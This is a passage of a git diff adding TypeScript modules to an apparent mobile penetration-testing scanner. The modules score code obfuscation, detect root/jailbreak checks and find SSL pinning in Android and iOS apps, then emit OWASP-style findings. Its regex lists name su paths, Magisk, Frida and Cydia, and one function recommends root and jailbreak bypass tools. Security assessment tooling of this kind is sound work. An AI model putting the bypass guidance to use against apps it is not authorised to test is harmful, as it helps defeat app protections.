+      controlFlowObfuscation: false,
+      resourceObfuscation: false,
+      nativeCodeProtection: false,
+      packingDetected: false,
+      obfuscatedClassRatio: 0,
+      totalClasses: 0,
+      obfuscatedClasses: 0,
+    }
+
+    // Analyze smali files
+    for (const smaliDir of smaliDirs) {
+      await analyzeSmaliDirectory(smaliDir, analysis)
+    }
+
+    // Analyze Java files if available
+    if (javaFiles && javaFiles.length > 0) {
+      await analyzeJavaFiles(javaFiles, analysis)
+    }
+
+    // Determine tool and strength
+    const tool = detectObfuscationTool(analysis)
+    const strength = determineStrength(analysis)
+
+    return {
+      detected: analysis.obfuscatedClassRatio > 0.1 || analysis.stringEncryption || analysis.controlFlowObfuscation,
+      tool,
+      strength,
+      stringEncryption: analysis.stringEncryption,
+      controlFlowObfuscation: analysis.controlFlowObfuscation,
+      classRenaming: analysis.classRenaming,
+      methodRenaming: analysis.methodRenaming,
+      resourceObfuscation: analysis.resourceObfuscation,
+    }
+  }
+
+  /**
+   * Analyze obfuscation in iOS binary.
+   */
+  export async function analyzeiOS(
+    sourceFiles: string[],
+    binaryInfo?: { symbols: boolean; encrypted: boolean }
+  ): Promise<MobileScanTypes.ObfuscationResult> {
+    log.info("Analyzing iOS obfuscation", { fileCount: sourceFiles.length })
+
+    const analysis: ObfuscationAnalysis = {
+      classRenaming: false,
+      methodRenaming: false,
+      stringEncryption: false,
+      controlFlowObfuscation: false,
+      resourceObfuscation: false,
+      nativeCodeProtection: false,
+      packingDetected: false,
+      obfuscatedClassRatio: 0,
+      totalClasses: 0,
+      obfuscatedClasses: 0,
+    }
+
+    // Check binary info
+    if (binaryInfo) {
+      if (binaryInfo.encrypted) {
+        analysis.nativeCodeProtection = true
+      }
+      if (!binaryInfo.symbols) {
+        analysis.methodRenaming = true
+      }
+    }
+
+    // Analyze source files
+    for (const file of sourceFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+
+        // Check for obfuscated class/method names
+        const obfuscatedPatterns = [/class\s+[A-Z][a-z]{0,2}\s*[:{]/, /func\s+[a-z]{1,2}\s*\(/]
+        for (const pattern of obfuscatedPatterns) {
+          if (pattern.test(content)) {
+            analysis.classRenaming = true
+            analysis.methodRenaming = true
+            analysis.obfuscatedClasses++
+          }
+        }
+
+        analysis.totalClasses++
+
+        // Check for string encryption patterns
+        if (content.includes("decrypt") || content.includes("XOR") || /\[\s*UInt8\s*\]\s*\(/.test(content)) {
+          analysis.stringEncryption = true
+        }
+
+        // Check for control flow obfuscation
+        if (/switch.*case.*case.*case.*case.*case/.test(content) || /goto/.test(content)) {
+          analysis.controlFlowObfuscation = true
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    if (analysis.totalClasses > 0) {
+      analysis.obfuscatedClassRatio = analysis.obfuscatedClasses / analysis.totalClasses
+    }
+
+    const tool = detectObfuscationTool(analysis, "ios")
+    const strength = determineStrength(analysis)
+
+    return {
+      detected: analysis.obfuscatedClassRatio > 0.1 || analysis.stringEncryption || analysis.nativeCodeProtection,
+      tool,
+      strength,
+      stringEncryption: analysis.stringEncryption,
+      controlFlowObfuscation: analysis.controlFlowObfuscation,
+      classRenaming: analysis.classRenaming,
+      methodRenaming: analysis.methodRenaming,
+      resourceObfuscation: analysis.resourceObfuscation,
+    }
+  }
+
+  /**
+   * Internal analysis state.
+   */
+  interface ObfuscationAnalysis {
+    classRenaming: boolean
+    methodRenaming: boolean
+    stringEncryption: boolean
+    controlFlowObfuscation: boolean
+    resourceObfuscation: boolean
+    nativeCodeProtection: boolean
+    packingDetected: boolean
+    obfuscatedClassRatio: number
+    totalClasses: number
+    obfuscatedClasses: number
+  }
+
+  /**
+   * Analyze smali directory.
+   */
+  async function analyzeSmaliDirectory(dir: string, analysis: ObfuscationAnalysis): Promise<void> {
+    try {
+      const files = await walkDirectory(dir, ".smali")
+
+      for (const file of files) {
+        try {
+          const content = await fs.readFile(file, "utf-8")
+          const className = path.basename(file, ".smali")
+
+          analysis.totalClasses++
+
+          // Check for obfuscated class names (single letters or short meaningless names)
+          if (/^[a-z]$/.test(className) || /^[a-z]{1,2}$/.test(className)) {
+            analysis.obfuscatedClasses++
+            analysis.classRenaming = true
+          }
+
+          // Check for obfuscated method names
+          if (/\.method\s+(?:public|private|protected)?\s*(?:static)?\s*[a-z]{1,2}\(/.test(content)) {
+            analysis.methodRenaming = true
+          }
+
+          // Check for string encryption (common patterns)
+          if (
+            content.includes("invoke-static") &&
+            (content.includes("decrypt") || content.includes("decode") || /invoke-static.*Ljava\/lang\/String;->valueOf/.test(content))
+          ) {
+            analysis.stringEncryption = true
+          }
+
+          // Check for control flow obfuscation
+          const gotoCount = (content.match(/goto/g) || []).length
+          const switchCount = (content.match(/packed-switch|sparse-switch/g) || []).length
+          if (gotoCount > 20 || switchCount > 5) {
+            analysis.controlFlowObfuscation = true
+          }
+
+          // Check for native code protection
+          if (content.includes(".native") || content.includes("Ljava/lang/Runtime;->loadLibrary")) {
+            analysis.nativeCodeProtection = true
+          }
+        } catch {
+          // Skip files that can't be read
+        }
+      }
+
+      if (analysis.totalClasses > 0) {
+        analysis.obfuscatedClassRatio = analysis.obfuscatedClasses / analysis.totalClasses
+      }
+    } catch {
+      log.debug("Failed to analyze smali directory", { dir })
+    }
+  }
+
+  /**
+   * Analyze Java files.
+   */
+  async function analyzeJavaFiles(files: string[], analysis: ObfuscationAnalysis): Promise<void> {
+    for (const file of files) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const className = path.basename(file, ".java")
+
+        analysis.totalClasses++
+
+        // Check for obfuscated class names
+        if (/^[a-z]$/.test(className) || /^[a-z]{1,2}$/.test(className)) {
+          analysis.obfuscatedClasses++
+          analysis.classRenaming = true
+        }
+
+        // Check for obfuscated method names
+        if (/(?:public|private|protected)?\s*(?:static)?\s*\w+\s+[a-z]{1,2}\s*\(/.test(content)) {
+          analysis.methodRenaming = true
+        }
+
+        // Check for string encryption
+        if (/new\s+String\s*\(\s*new\s+byte\s*\[\s*\]/.test(content) || content.includes("Base64.decode")) {
+          analysis.stringEncryption = true
+        }
+
+        // Check for reflection-based string encryption
+        if (/Class\.forName.*Method.*invoke/.test(content)) {
+          analysis.stringEncryption = true
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    if (analysis.totalClasses > 0) {
+      analysis.obfuscatedClassRatio = analysis.obfuscatedClasses / analysis.totalClasses
+    }
+  }
+
+  /**
+   * Walk directory recursively.
+   */
+  async function walkDirectory(dir: string, extension: string): Promise<string[]> {
+    const files: string[] = []
+
+    async function walk(currentDir: string): Promise<void> {
+      try {
+        const entries = await fs.readdir(currentDir, { withFileTypes: true })
+        for (const entry of entries) {
+          const fullPath = path.join(currentDir, entry.name)
+          if (entry.isDirectory()) {
+            await walk(fullPath)
+          } else if (entry.name.endsWith(extension)) {
+            files.push(fullPath)
+          }
+        }
+      } catch {
+        // Directory doesn't exist or can't be read
+      }
+    }
+
+    await walk(dir)
+    return files
+  }
+
+  /**
+   * Detect obfuscation tool.
+   */
+  function detectObfuscationTool(
+    analysis: ObfuscationAnalysis,
+    platform?: "android" | "ios"
+  ): string | undefined {
+    // Strong obfuscation with string encryption usually indicates commercial tools
+    if (analysis.stringEncryption && analysis.controlFlowObfuscation) {
+      if (platform === "ios") {
+        return "iXGuard"
+      }
+      return "DexGuard"
+    }
+
+    // Basic class/method renaming is typically ProGuard/R8
+    if (analysis.classRenaming || analysis.methodRenaming) {
+      if (analysis.obfuscatedClassRatio > 0.5) {
+        return platform === "ios" ? undefined : "ProGuard/R8"
+      }
+    }
+
+    // Native protection suggests packer
+    if (analysis.nativeCodeProtection && analysis.packingDetected) {
+      return "Unknown Packer"
+    }
+
+    return undefined
+  }
+
+  /**
+   * Determine obfuscation strength.
+   */
+  function determineStrength(analysis: ObfuscationAnalysis): "strong" | "medium" | "weak" | "none" {
+    let score = 0
+
+    if (analysis.classRenaming) score += 1
+    if (analysis.methodRenaming) score += 1
+    if (analysis.stringEncryption) score += 2
+    if (analysis.controlFlowObfuscation) score += 2
+    if (analysis.nativeCodeProtection) score += 2
+    if (analysis.resourceObfuscation) score += 1
+    if (analysis.obfuscatedClassRatio > 0.7) score += 1
+
+    if (score >= 6) return "strong"
+    if (score >= 3) return "medium"
+    if (score >= 1) return "weak"
+    return "none"
+  }
+
+  /**
+   * Generate finding for missing obfuscation.
+   */
+  export function createMissingObfuscationFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    return {
+      scanId,
+      appId,
+      platform,
+      title: "Missing Code Obfuscation",
+      description:
+        "The application does not use code obfuscation, making it easier for attackers to reverse engineer the application, understand its logic, and potentially find vulnerabilities or extract sensitive information.",
+      severity: "low",
+      owaspMobile: "M7",
+      category: "binary",
+      recommendation:
+        platform === "android"
+          ? "Enable ProGuard/R8 obfuscation at minimum. For sensitive applications, consider commercial obfuscation tools like DexGuard."
+          : "Use code obfuscation tools and ensure symbol stripping is enabled. For sensitive applications, consider commercial tools like iXGuard.",
+      references: [
+        "https://owasp.org/www-project-mobile-security-testing-guide/",
+        platform === "android"
+          ? "https://developer.android.com/studio/build/shrink-code"
+          : "https://developer.apple.com/documentation/xcode/building_your_app_for_distribution",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate finding for weak obfuscation.
+   */
+  export function createWeakObfuscationFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    result: MobileScanTypes.ObfuscationResult
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    return {
+      scanId,
+      appId,
+      platform,
+      title: "Weak Code Obfuscation",
+      description: `The application uses weak obfuscation (${result.tool || "basic renaming"}). Only class/method renaming is applied without string encryption or control flow obfuscation, making reverse engineering relatively straightforward.`,
+      severity: "low",
+      owaspMobile: "M7",
+      category: "binary",
+      evidence: `Tool: ${result.tool || "Unknown"}, String Encryption: ${result.stringEncryption ? "Yes" : "No"}, Control Flow: ${result.controlFlowObfuscation ? "Yes" : "No"}`,
+      recommendation:
+        "Consider implementing additional obfuscation techniques including string encryption, control flow obfuscation, and native code protection for sensitive applications.",
+      references: ["https://owasp.org/www-project-mobile-security-testing-guide/"],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/common/root-detection.ts b/packages/opencode/src/pentest/mobilescan/common/root-detection.ts
new file mode 100644
index 00000000000..88aca4ac4e1
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/common/root-detection.ts
@@ -0,0 +1,477 @@
+/**
+ * @fileoverview Root/Jailbreak Detection Analysis
+ *
+ * Detects root (Android) and jailbreak (iOS) detection mechanisms in mobile applications.
+ *
+ * @module pentest/mobilescan/common/root-detection
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+
+const log = Log.create({ service: "mobilescan.common.root-detection" })
+
+/**
+ * Root/Jailbreak detection namespace.
+ */
+export namespace RootDetector {
+  /**
+   * Android root detection patterns.
+   */
+  export const ANDROID_ROOT_PATTERNS: Array<{
+    method: string
+    pattern: RegExp
+    strength: "strong" | "medium" | "weak"
+    description: string
+  }> = [
+    // Su binary checks
+    {
+      method: "su_binary_check",
+      pattern: /\/system\/xbin\/su|\/system\/bin\/su|\/sbin\/su|\/data\/local\/xbin\/su|\/data\/local\/bin\/su/,
+      strength: "weak",
+      description: "Checks for su binary in common locations",
+    },
+    // Superuser app checks
+    {
+      method: "superuser_app_check",
+      pattern: /com\.noshufou\.android\.su|com\.thirdparty\.superuser|eu\.chainfire\.supersu|com\.koushikdutta\.superuser/,
+      strength: "weak",
+      description: "Checks for known superuser management apps",
+    },
+    // Magisk checks
+    {
+      method: "magisk_check",
+      pattern: /com\.topjohnwu\.magisk|MagiskManager|magisk/i,
+      strength: "medium",
+      description: "Checks for Magisk root solution",
+    },
+    // Test-keys check
+    {
+      method: "test_keys_check",
+      pattern: /test-keys|ro\.build\.tags/,
+      strength: "weak",
+      description: "Checks for test-keys build signature",
+    },
+    // Busybox check
+    {
+      method: "busybox_check",
+      pattern: /\/system\/xbin\/busybox|busybox/,
+      strength: "weak",
+      description: "Checks for busybox binary",
+    },
+    // Root apps check
+    {
+      method: "root_apps_check",
+      pattern: /\/system\/app\/Superuser\.apk|Superuser\.apk/,
+      strength: "weak",
+      description: "Checks for Superuser.apk",
+    },
+    // Root management detection
+    {
+      method: "root_management_check",
+      pattern: /RootBeer|RootTools|RootChecker/i,
+      strength: "medium",
+      description: "Uses root detection library",
+    },
+    // SafetyNet/Play Integrity
+    {
+      method: "safetynet_check",
+      pattern: /SafetyNet|PlayIntegrity|com\.google\.android\.gms\.safetynet/,
+      strength: "strong",
+      description: "Uses Google SafetyNet/Play Integrity API",
+    },
+    // Runtime exec su check
+    {
+      method: "runtime_exec_su",
+      pattern: /Runtime\.getRuntime\.exec\s*$\s*["']su["']\s*$|ProcessBuilder.*["']su["']/,
+      strength: "medium",
+      description: "Attempts to execute su command",
+    },
+    // Build properties check
+    {
+      method: "build_props_check",
+      pattern: /ro\.debuggable|ro\.secure|selinux/,
+      strength: "medium",
+      description: "Checks build properties for root indicators",
+    },
+    // Directory write check
+    {
+      method: "system_write_check",
+      pattern: /canWrite\s*$\s*$.*\/system|\/system.*canWrite/,
+      strength: "medium",
+      description: "Checks if system partition is writable",
+    },
+    // Xposed framework detection
+    {
+      method: "xposed_check",
+      pattern: /de\.robv\.android\.xposed|XposedBridge|XposedHelpers/,
+      strength: "strong",
+      description: "Detects Xposed framework",
+    },
+    // Frida detection
+    {
+      method: "frida_check",
+      pattern: /frida-server|27042|frida-gadget|re\.frida\.server/,
+      strength: "strong",
+      description: "Detects Frida instrumentation framework",
+    },
+  ]
+
+  /**
+   * iOS jailbreak detection patterns.
+   */
+  export const IOS_JAILBREAK_PATTERNS: Array<{
+    method: string
+    pattern: RegExp
+    strength: "strong" | "medium" | "weak"
+    description: string
+  }> = [
+    // Cydia app check
+    {
+      method: "cydia_app_check",
+      pattern: /\/Applications\/Cydia\.app|cydia:\/\//,
+      strength: "weak",
+      description: "Checks for Cydia app",
+    },
+    // Common jailbreak paths
+    {
+      method: "jailbreak_paths_check",
+      pattern:
+        /\/Applications\/FakeCarrier\.app|\/Applications\/Icy\.app|\/Applications\/IntelliScreen\.app|\/Applications\/MxTube\.app|\/Applications\/RockApp\.app|\/Applications\/SBSettings\.app|\/Applications\/WinterBoard\.app|\/Applications\/blackra1n\.app/,
+      strength: "weak",
+      description: "Checks for known jailbreak apps",
+    },
+    // Substrate check
+    {
+      method: "substrate_check",
+      pattern: /\/Library\/MobileSubstrate\/MobileSubstrate\.dylib|MobileSubstrate/,
+      strength: "medium",
+      description: "Checks for MobileSubstrate",
+    },
+    // SSH daemon check
+    {
+      method: "ssh_check",
+      pattern: /\/usr\/sbin\/sshd|\/usr\/libexec\/ssh-keysign/,
+      strength: "medium",
+      description: "Checks for SSH daemon",
+    },
+    // Shell binaries check
+    {
+      method: "shell_check",
+      pattern: /\/bin\/bash|\/bin\/sh/,
+      strength: "weak",
+      description: "Checks for shell binaries",
+    },
+    // Apt/dpkg check
+    {
+      method: "apt_check",
+      pattern: /\/etc\/apt|\/private\/var\/lib\/apt|\/private\/var\/lib\/cydia/,
+      strength: "medium",
+      description: "Checks for apt/dpkg package managers",
+    },
+    // Frida check
+    {
+      method: "frida_ios_check",
+      pattern: /\/usr\/sbin\/frida-server|frida-gadget|FridaGadget/,
+      strength: "strong",
+      description: "Detects Frida on iOS",
+    },
+    // URL scheme check
+    {
+      method: "url_scheme_check",
+      pattern: /canOpenURL.*cydia:\/\/|openURL.*cydia:\/\//,
+      strength: "weak",
+      description: "Checks if Cydia URL scheme is available",
+    },
+    // File existence check
+    {
+      method: "file_existence_check",
+      pattern: /fileExistsAtPath|NSFileManager.*\/private\/var\/stash/,
+      strength: "medium",
+      description: "Checks for jailbreak file existence",
+    },
+    // Fork check
+    {
+      method: "fork_check",
+      pattern: /fork\s*$\s*$|sandbox_check/,
+      strength: "medium",
+      description: "Attempts to fork process (blocked on non-jailbroken)",
+    },
+    // Symbolic link check
+    {
+      method: "symlink_check",
+      pattern: /\/Applications.*symbolicLinkDestination|isSymbolicLink/,
+      strength: "medium",
+      description: "Checks for symbolic links in /Applications",
+    },
+    // Dynamic library loading check
+    {
+      method: "dylib_check",
+      pattern: /dlopen.*\/Library\/MobileSubstrate|_dyld_get_image_name/,
+      strength: "strong",
+      description: "Checks loaded dynamic libraries",
+    },
+    // Liberty Lite / Shadow detection
+    {
+      method: "bypass_tool_check",
+      pattern: /LibertyLite|Shadow|HideJB|A-Bypass|FlyJB/,
+      strength: "strong",
+      description: "Detects jailbreak bypass tools",
+    },
+  ]
+
+  /**
+   * Detect root detection in Android code.
+   */
+  export async function detectAndroid(javaFiles: string[]): Promise<MobileScanTypes.RootDetectionResult> {
+    log.info("Detecting root detection in Android", { fileCount: javaFiles.length })
+
+    const methods: string[] = []
+    const locations: MobileScanTypes.CodeLocation[] = []
+    let strongestStrength: "strong" | "medium" | "weak" | undefined
+
+    for (const file of javaFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of ANDROID_ROOT_PATTERNS) {
+          for (let i = 0; i < lines.length; i++) {
+            if (pattern.pattern.test(lines[i])) {
+              if (!methods.includes(pattern.method)) {
+                methods.push(pattern.method)
+
+                // Track strongest detection method
+                if (!strongestStrength || strengthOrder(pattern.strength) < strengthOrder(strongestStrength)) {
+                  strongestStrength = pattern.strength
+                }
+              }
+
+              locations.push({
+                file,
+                line: i + 1,
+                snippet: lines[i].trim(),
+              })
+            }
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return {
+      detected: methods.length > 0,
+      methods,
+      locations,
+      bypassable: !methods.includes("safetynet_check") && !methods.includes("frida_check"),
+      strength: strongestStrength,
+    }
+  }
+
+  /**
+   * Detect jailbreak detection in iOS code.
+   */
+  export async function detectiOS(sourceFiles: string[]): Promise<MobileScanTypes.RootDetectionResult> {
+    log.info("Detecting jailbreak detection in iOS", { fileCount: sourceFiles.length })
+
+    const methods: string[] = []
+    const locations: MobileScanTypes.CodeLocation[] = []
+    let strongestStrength: "strong" | "medium" | "weak" | undefined
+
+    for (const file of sourceFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of IOS_JAILBREAK_PATTERNS) {
+          for (let i = 0; i < lines.length; i++) {
+            if (pattern.pattern.test(lines[i])) {
+              if (!methods.includes(pattern.method)) {
+                methods.push(pattern.method)
+
+                // Track strongest detection method
+                if (!strongestStrength || strengthOrder(pattern.strength) < strengthOrder(strongestStrength)) {
+                  strongestStrength = pattern.strength
+                }
+              }
+
+              locations.push({
+                file,
+                line: i + 1,
+                snippet: lines[i].trim(),
+              })
+            }
+          }
+        }
+      } catch {
+        // Skip files that can't be read
+      }
+    }
+
+    return {
+      detected: methods.length > 0,
+      methods,
+      locations,
+      bypassable: !methods.includes("dylib_check") && !methods.includes("bypass_tool_check"),
+      strength: strongestStrength,
+    }
+  }
+
+  /**
+   * Get strength order for comparison.
+   */
+  function strengthOrder(strength: "strong" | "medium" | "weak"): number {
+    switch (strength) {
+      case "strong":
+        return 0
+      case "medium":
+        return 1
+      case "weak":
+        return 2
+    }
+  }
+
+  /**
+   * Detect root detection from string constants.
+   */
+  export function detectFromStrings(strings: string[], platform: MobileScanTypes.Platform): {
+    detected: boolean
+    indicators: string[]
+  } {
+    const indicators: string[] = []
+    const checkList =
+      platform === "android" ? MobileScanTypes.ROOT_DETECTION_INDICATORS : MobileScanTypes.JAILBREAK_DETECTION_INDICATORS
+
+    for (const str of strings) {
+      for (const indicator of checkList) {
+        if (str.includes(indicator)) {
+          indicators.push(indicator)
+        }
+      }
+    }
+
+    return {
+      detected: indicators.length > 0,
+      indicators: [...new Set(indicators)],
+    }
+  }
+
+  /**
+   * Assess bypass difficulty.
+   */
+  export function assessBypassDifficulty(result: MobileScanTypes.RootDetectionResult): {
+    difficulty: "easy" | "medium" | "hard"
+    recommendedTools: string[]
+    notes: string[]
+  } {
+    const notes: string[] = []
+    let difficulty: "easy" | "medium" | "hard" = "easy"
+    const recommendedTools: string[] = []
+
+    if (!result.detected) {
+      return {
+        difficulty: "easy",
+        recommendedTools: [],
+        notes: ["No root/jailbreak detection found"],
+      }
+    }
+
+    // Assess based on methods used
+    const hasStrongDetection = result.strength === "strong"
+    const methodCount = result.methods.length
+
+    if (hasStrongDetection) {
+      difficulty = "hard"
+      notes.push("Strong detection methods found (SafetyNet, Frida detection, etc.)")
+    } else if (methodCount > 5 || result.strength === "medium") {
+      difficulty = "medium"
+      notes.push("Multiple detection methods implemented")
+    } else {
+      difficulty = "easy"
+      notes.push("Basic detection methods only")
+    }
+
+    // Recommend tools based on platform inference
+    if (
+      result.methods.some((m) => ANDROID_ROOT_PATTERNS.some((p) => p.method === m))
+    ) {
+      recommendedTools.push("Magisk Hide", "Frida", "RootCloak")
+      if (result.methods.includes("safetynet_check")) {
+        recommendedTools.push("Universal SafetyNet Fix", "MagiskHide Props Config")
+        notes.push("SafetyNet bypass may require additional Magisk modules")
+      }
+    }
+
+    if (result.methods.some((m) => IOS_JAILBREAK_PATTERNS.some((p) => p.method === m))) {
+      recommendedTools.push("Liberty Lite", "Shadow", "A-Bypass", "Frida")
+      if (result.methods.includes("dylib_check")) {
+        notes.push("Dynamic library checking requires advanced bypass techniques")
+      }
+    }
+
+    return { difficulty, recommendedTools, notes }
+  }
+
+  /**
+   * Generate finding for missing root detection.
+   */
+  export function createMissingDetectionFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    const term = platform === "android" ? "root" : "jailbreak"
+    return {
+      scanId,
+      appId,
+      platform,
+      title: `Missing ${term.charAt(0).toUpperCase() + term.slice(1)} Detection`,
+      description: `The application does not implement ${term} detection. On a ${term}ed device, attackers can more easily reverse engineer, tamper with, or intercept application data.`,
+      severity: "low",
+      owaspMobile: "M7",
+      category: "binary",
+      recommendation: `Implement ${term} detection using platform-recommended methods. For sensitive applications, consider implementing multiple detection techniques and SafetyNet/DeviceCheck APIs.`,
+      references: [
+        "https://owasp.org/www-project-mobile-security-testing-guide/",
+        platform === "android"
+          ? "https://developer.android.com/training/safetynet"
+          : "https://developer.apple.com/documentation/devicecheck",
+      ],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Generate finding for weak root detection.
+   */
+  export function createWeakDetectionFinding(
+    scanId: string,
+    appId: string,
+    platform: MobileScanTypes.Platform,
+    result: MobileScanTypes.RootDetectionResult
+  ): Omit<MobileScanTypes.MobileFinding, "id"> {
+    const term = platform === "android" ? "root" : "jailbreak"
+    const bypass = assessBypassDifficulty(result)
+
+    return {
+      scanId,
+      appId,
+      platform,
+      title: `Weak ${term.charAt(0).toUpperCase() + term.slice(1)} Detection Implementation`,
+      description: `The application implements ${term} detection using ${result.methods.length} method(s) with ${result.strength || "weak"} strength. Bypass difficulty: ${bypass.difficulty}. Methods detected: ${result.methods.join(", ")}.`,
+      severity: result.strength === "weak" ? "medium" : "low",
+      owaspMobile: "M7",
+      category: "binary",
+      evidence: `Detection methods: ${result.methods.join(", ")}`,
+      recommendation: `Strengthen ${term} detection by implementing multiple techniques including SafetyNet/DeviceCheck APIs. Consider server-side validation of device integrity.`,
+      references: ["https://owasp.org/www-project-mobile-security-testing-guide/"],
+      falsePositive: false,
+      verified: false,
+      detectedAt: Date.now(),
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/mobilescan/common/ssl-pinning.ts b/packages/opencode/src/pentest/mobilescan/common/ssl-pinning.ts
new file mode 100644
index 00000000000..0530734b4d0
--- /dev/null
+++ b/packages/opencode/src/pentest/mobilescan/common/ssl-pinning.ts
@@ -0,0 +1,472 @@
+/**
+ * @fileoverview SSL/Certificate Pinning Detection
+ *
+ * Detects certificate pinning implementations in mobile applications.
+ * Supports both Android and iOS pinning detection.
+ *
+ * @module pentest/mobilescan/common/ssl-pinning
+ */
+
+import { MobileScanTypes } from "../types"
+import { Log } from "../../../util/log"
+import { promises as fs } from "fs"
+
+const log = Log.create({ service: "mobilescan.common.ssl-pinning" })
+
+/**
+ * SSL Pinning detection namespace.
+ */
+export namespace SSLPinningDetector {
+  /**
+   * Android pinning patterns.
+   */
+  export const ANDROID_PATTERNS: Array<{
+    name: string
+    implementation: string
+    patterns: RegExp[]
+    bypassable: boolean
+  }> = [
+    {
+      name: "OkHttp Certificate Pinner",
+      implementation: "OkHttp",
+      patterns: [
+        /CertificatePinner\.Builder/,
+        /\.certificatePinner\s*\(/,
+        /CertificatePinner/,
+        /\.add\s*\(\s*["'][^"']+["']\s*,\s*["']sha256\//,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "Network Security Config",
+      implementation: "AndroidNativeConfig",
+      patterns: [
+        /<pin-set/,
+        /<pin\s+digest\s*=/,
+        /networkSecurityConfig/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "TrustManager Implementation",
+      implementation: "CustomTrustManager",
+      patterns: [
+        /implements\s+X509TrustManager/,
+        /extends\s+X509ExtendedTrustManager/,
+        /checkServerTrusted/,
+        /TrustManagerFactory\.getInstance/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "SSL Pinning Library",
+      implementation: "TrustKit",
+      patterns: [
+        /TrustKit/i,
+        /io\.github\.nicklasoxhammar\.trustkit/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "Retrofit SSL Pinning",
+      implementation: "Retrofit",
+      patterns: [
+        /SSLSocketFactory/,
+        /X509TrustManager.*getAcceptedIssuers/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "Flutter SSL Pinning",
+      implementation: "Flutter",
+      patterns: [
+        /SecurityContext.*setTrustedCertificates/,
+        /badCertificateCallback/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "React Native SSL Pinning",
+      implementation: "ReactNative",
+      patterns: [
+        /react-native-ssl-pinning/,
+        /ssl-pinning-react-native/,
+      ],
+      bypassable: true,
+    },
+  ]
+
+  /**
+   * iOS pinning patterns.
+   */
+  export const IOS_PATTERNS: Array<{
+    name: string
+    implementation: string
+    patterns: RegExp[]
+    bypassable: boolean
+  }> = [
+    {
+      name: "URLSession Delegate",
+      implementation: "URLSessionDelegate",
+      patterns: [
+        /didReceive\s+challenge.*URLAuthenticationChallenge/,
+        /SecTrustEvaluate/,
+        /SecTrustEvaluateWithError/,
+        /serverTrust/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "TrustKit",
+      implementation: "TrustKit",
+      patterns: [
+        /TrustKit/,
+        /TSKPinningValidator/,
+        /initSharedInstanceWithConfiguration/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "Alamofire Pinning",
+      implementation: "Alamofire",
+      patterns: [
+        /ServerTrustManager/,
+        /PinnedCertificatesTrustEvaluator/,
+        /PublicKeysTrustEvaluator/,
+        /DefaultTrustEvaluator/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "AFNetworking Pinning",
+      implementation: "AFNetworking",
+      patterns: [
+        /AFSecurityPolicy/,
+        /AFSSLPinningModeCertificate/,
+        /AFSSLPinningModePublicKey/,
+        /setPinnedCertificates/,
+      ],
+      bypassable: true,
+    },
+    {
+      name: "App Transport Security",
+      implementation: "ATS",
+      patterns: [
+        /NSAppTransportSecurity/,
+        /NSPinnedDomains/,
+        /NSPinnedCAIdentities/,
+        /NSPinnedLeafIdentities/,
+      ],
+      bypassable: false,
+    },
+    {
+      name: "Custom SecTrust",
+      implementation: "CustomSecTrust",
+      patterns: [
+        /SecTrustSetAnchorCertificates/,
+        /SecTrustSetAnchorCertificatesOnly/,
+        /SecCertificateCreateWithData/,
+      ],
+      bypassable: true,
+    },
+  ]
+
+  /**
+   * Detect SSL pinning in Android code.
+   */
+  export async function detectAndroid(
+    javaFiles: string[],
+    manifestContent?: string,
+    networkSecurityConfig?: string
+  ): Promise<MobileScanTypes.SSLPinningResult> {
+    log.info("Detecting SSL pinning in Android", { fileCount: javaFiles.length })
+
+    const detected = false
+    let implementation: string | undefined
+    const pinnedDomains: string[] = []
+    const locations: MobileScanTypes.CodeLocation[] = []
+    let bypassable = true
+
+    // Check network security config first
+    if (networkSecurityConfig) {
+      const nscResult = analyzeNetworkSecurityConfig(networkSecurityConfig)
+      if (nscResult.hasPinning) {
+        return {
+          detected: true,
+          implementation: "AndroidNativeConfig",
+          pinnedDomains: nscResult.domains,
+          locations: [{ file: "network_security_config.xml" }],
+          bypassable: true,
+          notes: "Certificate pinning via Network Security Configuration",
+        }
+      }
+    }
+
+    // Check manifest for network security config reference
+    if (manifestContent && manifestContent.includes("networkSecurityConfig")) {
+      locations.push({ file: "AndroidManifest.xml", snippet: "networkSecurityConfig referenced" })
+    }
+
+    // Scan Java files
+    for (const file of javaFiles) {
+      try {
+        const content = await fs.readFile(file, "utf-8")
+        const lines = content.split("\n")
+
+        for (const pattern of ANDROID_PATTERNS) {
+          for (const regex of pattern.patterns) {
+            for (let i = 0; i < lines.length; i++) {
+              if (regex.test(lines[i])) {
+                if (!implementation) {
+                  implementation = pattern.implementation
+                  bypassable = pattern.bypassable
+                }
+
+                locations.push({
+                  file,
+                  line: i + 1,
+                  snippet: lines[i].trim(),
+                })
+
+                // Try to extract pinned domains
+                const domains = extractPinnedDomainsFromCode(content)
+                pinnedDomains.push(...domains)
+                break
+              }
+            }
+          }
+        }
+      } catch {
